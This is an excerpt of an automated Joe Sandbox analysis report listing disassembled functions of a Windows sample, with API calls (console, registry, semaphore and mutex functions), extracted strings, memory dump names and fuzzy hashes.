                                              • Instruction ID: 01f2b038ad897706f8ea4c72be0d3401893fb57f339805cbe8791a25fb78edac
                                              • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                              • Instruction Fuzzy Hash: C8519823B0868297EA245F15F6047B9A6A1FB4D7B8F084435DE0AC37A4DF3EE545CB06
                                              Function 00007FF6EB1789C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$DriveErrorInformationLastTypeVolume
                                              • String ID:
                                              • API String ID: 850181435-0
                                              • Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                              • Instruction ID: 8e3b18f6e5c41660923f9c67f205080ebb5a76db68c77cff41229934961a647d
                                              • Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                              • Instruction Fuzzy Hash: 9D418F33608BD1C9E7618F21E8443E977A4FB8DB58F444125DA4D8BBA8CF3AD649C705
                                              Function 00007FF6EB1834A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB183578: _get_osfhandle.MSVCRT ref: 00007FF6EB183584
                                                • Part of subcall function 00007FF6EB183578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB18359C
                                                • Part of subcall function 00007FF6EB183578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835C3
                                                • Part of subcall function 00007FF6EB183578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835D9
                                                • Part of subcall function 00007FF6EB183578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835ED
                                                • Part of subcall function 00007FF6EB183578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB183602
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB183514
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB183522
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB183541
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB18355E
                                                • Part of subcall function 00007FF6EB1836EC: _get_osfhandle.MSVCRT ref: 00007FF6EB183715
                                                • Part of subcall function 00007FF6EB1836EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6EB183770
                                                • Part of subcall function 00007FF6EB1836EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB183791
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                              • String ID:
                                              • API String ID: 4057327938-0
                                              • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                              • Instruction ID: 2f04be6e58ce9f1ba0da8e5cdd16aa84c554af790e6b767bdcd8d6bf17a8d7df
                                              • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                              • Instruction Fuzzy Hash: 38317423F0CA4296E7559B15B5003FDB6A0FF8E768F584135EA4EC33B5DE2EE4098609
                                              Function 00007FF6EB19BE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                              • String ID: KEYS$LIST$OFF
                                              • API String ID: 411561164-4129271751
                                              • Opcode ID: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                                              • Instruction ID: 83e1e6041050a7edcd742b03532c7c9ae106f195ad09d7bf54fa7b8c3c4a5d06
                                              • Opcode Fuzzy Hash: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                                              • Instruction Fuzzy Hash: 5E216222A08643C2F7149B25A4513F666A1FF4D7B8F409231C61EC62F5DF7EE8488A0A
                                              Function 00007FF6EB1801B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                              Download Yara Rule
                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB1801C4
                                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB1801D6
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB180212
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB180228
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB18023C
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB180251
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                              • String ID:
                                              • API String ID: 513048808-0
                                              • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                              • Instruction ID: 9dd476eabae84d79c18c42f7b0aafe5313695cd4178878ed8ca091e10b56769b
                                              • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                              • Instruction Fuzzy Hash: 32219F23908687C7E6515B60A6883B8BA90FF4E77DF144139D90E862F4CF7EE448870A
                                              Function 00007FF6EB183578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                              Download Yara Rule
                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB183584
                                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB18359C
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835C3
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835D9
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835ED
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB183602
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                              • String ID:
                                              • API String ID: 513048808-0
                                              • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                              • Instruction ID: c2da1774f99082da4f9b92e458b38c3825ac095b17b45acc2f69dd03cb8a1750
                                              • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                              • Instruction Fuzzy Hash: BE115722A08A4286DA105B64B6443B8AA90FF4E77DF195335E52F837F0DE3ED4458706
                                              Function 00007FF6EB189584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                              • String ID:
                                              • API String ID: 4104442557-0
                                              • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                              • Instruction ID: 7e3286bae3cb88f741fb4930baef807864bd96806beeee14ccc203812821f390
                                              • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                              • Instruction Fuzzy Hash: 05111F22604F418AEB00DF64E8443E933A4FB5D76CF401A34EA6D87B64DF7DE5A88744
                                              Function 00007FF6EB19711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB1971F9
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB19720D
                                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB197300
                                                • Part of subcall function 00007FF6EB195740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF6EB1975C4,?,?,00000000,00007FF6EB196999,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB195744
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: OpenSemaphore$CloseErrorHandleLast
                                              • String ID: _p0$wil
                                              • API String ID: 455305043-1814513734
                                              • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                              • Instruction ID: b95d8de379387da7ee697481f6f1b84c4455cffc913901586884205543c553e3
                                              • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                              • Instruction Fuzzy Hash: 0661A063B1878282EF258F6594103F963A1FF8CBA8F554431DA0E877A4EF3EE5048309
                                              Function 00007FF6EB171DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heapiswspacememset$AllocProcess
                                              • String ID: %s
                                              • API String ID: 2401724867-3043279178
                                              • Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                              • Instruction ID: b4c16ee1cd964c0e3f44073be158fb07544095a5d7fc43ac1cb9061ba16ed73a
                                              • Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                              • Instruction Fuzzy Hash: 4251BE33A0869285EB218F21D8503F923A1FB4EBA8F044035DA5D877B4EF3EE555C70A
                                              Function 00007FF6EB17E260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: iswdigit
                                              • String ID: GeToken: (%x) '%s'
                                              • API String ID: 3849470556-1994581435
                                              • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                              • Instruction ID: c80c0b54ad611999e3add435b5ffab4f17d6d63c810064bd9711dc60aa7bcba4
                                              • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                              • Instruction Fuzzy Hash: C6518823A0C66286E7249B15E4443B976A4BB4DB28F048435DA4DC73F0DFBEE984C70A
                                              Function 00007FF6EB19992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB199A10
                                              • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB199994
                                                • Part of subcall function 00007FF6EB19A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A77A
                                                • Part of subcall function 00007FF6EB19A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A839
                                                • Part of subcall function 00007FF6EB19A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A850
                                              • wcsrchr.MSVCRT ref: 00007FF6EB199A62
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                              • String ID: %s=%s$.
                                              • API String ID: 3242694432-4275322459
                                              • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                              • Instruction ID: 887d1c95fbf232c98831d07d289e631fbe34dc26afc138d7314acaa646b48ace
                                              • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                              • Instruction Fuzzy Hash: 7941AE23A0978286EA149B11A5503FA62A0FF8E7F8F444234DD5D873E5EE7EE445870A
                                              Function 00007FF6EB1954B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6EB1954E6
                                              • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB19552E
                                                • Part of subcall function 00007FF6EB19758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6EB196999,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB1975AE
                                                • Part of subcall function 00007FF6EB19758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6EB196999,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB1975C6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CreateCurrentMutexProcess
                                              • String ID: Local\SM0:%d:%d:%hs$wil$x
                                              • API String ID: 779401067-630742106
                                              • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                              • Instruction ID: d0c06a69acbce52fe55dd07fb9fec2443e9a3bfa5e98e2a942e682030011905c
                                              • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                              • Instruction Fuzzy Hash: A651A433A187C282EB219B11E4407FA6360FF8C7A8F404032EA4DDBA65DE3EE505C705
                                              Function 00007FF6EB18417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CurrentDirectorytowupper
                                              • String ID: :$:
                                              • API String ID: 238703822-3780739392
                                              • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                              • Instruction ID: 55f0394987cdb798b28aa5991d07370a0b792ea8f138fba2a82bb140751aafe7
                                              • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                              • Instruction Fuzzy Hash: A5113453A08641C5EB258B21A8053B9B6A0FF4D7ADF458132DD0D877B4DF3DE1458B0A
                                              Function 00007FF6EB1758D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                              • API String ID: 3677997916-3870813718
                                              • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                              • Instruction ID: c45c1574d6486c540680004834c3663f3f6a7829e90f1c8e84cb4cb73e1d3d6c
                                              • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
